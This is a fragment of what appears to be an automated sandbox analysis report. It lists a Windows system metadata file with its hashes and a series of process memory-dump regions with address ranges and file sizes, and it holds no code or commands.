SHA512
2fcbe024e4d1bd41f0f1e4808f449877d9b22da9cc43afcddf6016e7b2a704a2d53bd27301cc24ad5335d1f3fe0c4a2dc901f7bb9a9e611c29b4701b542b2eda

Download Submit
\??\Volume{ff3ab8f7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{5c1d19d8-22dc-4561-bf1b-3b776a81e0e6}_OnDiskSnapshotProp

Filesize
6KB

MD5
861e5be968c22b0376a9c435c6b16ebc

SHA1
9d2a0609ca3b055a3ac7d10500527aa093947a23

SHA256
21404338dff1c4fd1cf709aacbba4c4e42ea436f8947f441710b37bd062bc52f

SHA512
47adb6ad7a7dc3b483500bec0ca0a73713c985f077d7b93f3ebbf4dbe8fb8f78c97086034fe99803644fce32aba22eccfc3eae1493d0bb9cb108ac946c757dcd

Download Submit
memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp

Filesize
1.6MB

Download
memory/4564-100-0x0000000005610000-0x0000000005964000-memory.dmp

Filesize
3.3MB

Download
memory/4564-102-0x0000000005D20000-0x0000000005D6C000-memory.dmp

Filesize
304KB

Download
memory/4564-115-0x0000000007260000-0x0000000007274000-memory.dmp

Filesize
80KB

Download
memory/4564-114-0x0000000007230000-0x0000000007241000-memory.dmp

Filesize
68KB

Download
memory/4564-113-0x0000000006E30000-0x0000000006ED3000-memory.dmp

Filesize
652KB

Download
memory/4564-103-0x0000000070350000-0x000000007039C000-memory.dmp

Filesize
304KB

Download
memory/4808-80-0x0000000006DF0000-0x0000000006E0A000-memory.dmp

Filesize
104KB

Download
memory/4808-41-0x0000000005500000-0x0000000005854000-memory.dmp

Filesize
3.3MB

Download
memory/4808-81-0x0000000006E70000-0x0000000006E7A000-memory.dmp

Filesize
40KB

Download
memory/4808-82-0x0000000007070000-0x0000000007106000-memory.dmp

Filesize
600KB

Download
memory/4808-83-0x0000000006FF0000-0x0000000007001000-memory.dmp

Filesize
68KB

Download
memory/4808-84-0x0000000007020000-0x000000000702E000-memory.dmp

Filesize
56KB

Download
memory/4808-85-0x0000000007030000-0x0000000007044000-memory.dmp

Filesize
80KB

Download
memory/4808-86-0x0000000007130000-0x000000000714A000-memory.dmp

Filesize
104KB

Download
memory/4808-87-0x0000000007110000-0x0000000007118000-memory.dmp

Filesize
32KB

Download
memory/4808-64-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

Filesize
120KB

Download
memory/4808-39-0x0000000004DD0000-0x0000000004E36000-memory.dmp

Filesize
408KB

Download
memory/4808-65-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

Filesize
304KB

Download
memory/4808-79-0x0000000007440000-0x0000000007ABA000-memory.dmp

Filesize
6.5MB

Download
memory/4808-78-0x0000000006AD0000-0x0000000006B73000-memory.dmp

Filesize
652KB

Download
memory/4808-77-0x0000000006090000-0x00000000060AE000-memory.dmp

Filesize
120KB

Download
memory/4808-67-0x0000000074E10000-0x0000000074E5C000-memory.dmp

Filesize
304KB

Download
memory/4808-66-0x0000000006A90000-0x0000000006AC2000-memory.dmp

Filesize
200KB

Download
memory/4808-40-0x0000000004E40000-0x0000000004EA6000-memory.dmp

Filesize
408KB

Download
memory/4808-38-0x0000000004B30000-0x0000000004B52000-memory.dmp

Filesize
136KB

Download
memory/4808-37-0x0000000004ED0000-0x00000000054F8000-memory.dmp

Filesize
6.2MB

Download
memory/4808-36-0x00000000021D0000-0x0000000002206000-memory.dmp

Filesize
216KB

Download